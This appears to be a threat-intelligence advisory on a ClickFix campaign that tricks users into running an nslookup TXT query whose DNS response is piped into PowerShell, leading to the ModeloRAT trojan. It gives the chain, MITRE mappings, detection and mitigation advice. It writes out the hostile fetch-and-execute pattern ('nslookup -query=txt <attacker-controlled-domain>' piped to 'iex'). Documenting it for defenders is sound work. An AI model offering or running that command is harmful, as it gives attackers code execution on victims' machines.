Executive Summary

Microsoft Threat Intelligence has reported on a novel evolution of the ClickFix social engineering technique. This new campaign tricks users into executing a malicious nslookup command, which leverages the Domain Name System (DNS) as a stealthy delivery mechanism for a PowerShell payload. This method helps attackers evade traditional web-based detection and has been observed deploying ModeloRAT, a Python-based remote access trojan (RAT). The technique highlights threat actors' ongoing innovation in abusing legitimate system tools and fundamental network protocols for malicious purposes.

Threat Overview

The ClickFix technique is a form of social engineering where users are presented with a fake error message or prompt, instructing them to copy and paste a command into the Windows Run dialog or Command Prompt to "fix" a non-existent issue.

This new variant weaponizes the nslookup utility. The attack proceeds as follows:

1. Social Engineering: A user is lured into running a command like nslookup -query=txt <attacker-controlled-domain>. The command is crafted to look innocuous.
2. DNS Query: The command forces the victim's machine to send a DNS TXT record query to a domain controlled by the attacker, specifying the attacker's DNS server.
3. Malicious Payload Delivery: The attacker's DNS server responds to the query. The payload, a PowerShell script, is embedded within the Name: field or TXT record of the DNS response.
4. Execution: The initial command executed by the user pipes this response into a PowerShell execution command (| iex), causing the malicious script to run on the victim's machine.
5. Staging: The PowerShell script downloads a ZIP archive containing a malicious Python script, which performs system reconnaissance.
6. Final Payload: The attack culminates in the deployment of a VBScript that establishes persistence and launches ModeloRAT, giving the attacker remote control over the system.

Technical Analysis

This attack chain demonstrates several defense evasion and execution techniques:

• T1204.002 - Malicious File: The attack relies on the user being tricked into executing the initial command.
• T1071.004 - Application Layer Protocol: DNS: The core of the technique is using DNS as a channel for C2 communications and payload delivery, which can be harder to inspect than HTTP/S traffic.
• T1059.001 - PowerShell: PowerShell is used as the initial execution engine on the victim's machine to decode and run the payload received via DNS.
• T1574.002 - DLL Side-Loading: While not explicitly stated, the use of a ZIP archive with multiple components is often a precursor to side-loading or other multi-stage execution flows.
• T1105 - Ingress Tool Transfer: The PowerShell script is used to download the next stage (ZIP archive) from an external source.

Impact Assessment

Successful execution of this attack leads to a full system compromise via the ModeloRAT trojan. The impact can include:

• Data Theft: The RAT can be used to exfiltrate sensitive files, keystrokes, and credentials from the compromised machine.
• Espionage: Attackers can use the RAT to spy on the user, capture screenshots, and monitor activity.
• Further Intrusion: The compromised machine can be used as a beachhead to move laterally within the victim's network.
• Botnet Enrollment: The system could be enrolled in a botnet for use in DDoS attacks or other malicious activities. The use of DNS for payload delivery makes this attack particularly insidious, as it may bypass security tools that are primarily focused on inspecting web traffic.

Cyber Observables for Detection

Detection & Response

• Command-Line Logging: Ensure robust command-line logging is enabled for all endpoints (e.g., via Sysmon or EDR). Create detection rules for nslookup.exe being used with non-standard parameters or its output being piped to an interpreter like powershell.exe. Reference D3FEND technique D3-PA - Process Analysis.
• DNS Monitoring: Monitor DNS traffic for anomalies. Look for queries to suspicious or newly registered domains, an unusually high volume of TXT queries, or DNS responses that are abnormally large. Tools that provide DNS inspection (DNS firewalls) can be very effective. Reference D3FEND technique D3-NTA - Network Traffic Analysis.
• PowerShell Logging: Enable PowerShell Script Block Logging and Module Logging to capture the content of scripts executed on endpoints, which would reveal the second-stage payload.
• User Training: Since the attack begins with social engineering, training users to be skeptical of instructions that ask them to run commands is a critical preventative measure.

Mitigation

• Application Control: Use application control solutions, like Windows Defender Application Control, to restrict the execution of unauthorized scripts and tools. Reference D3FEND technique D3-EAL - Executable Allowlisting.
• Attack Surface Reduction (ASR): Implement ASR rules to block or audit suspicious behaviors, such as VBScript creating executable content or processes originating from PSExec and WMI commands.
• DNS Filtering: Use a DNS filtering service to block queries to known malicious domains. This can break the attack chain at the DNS query stage. Reference D3FEND technique D3-DNSDL - DNS Denylisting.
• User Education: Train users to never copy and paste commands from pop-ups, websites, or emails into a command prompt or Run dialog.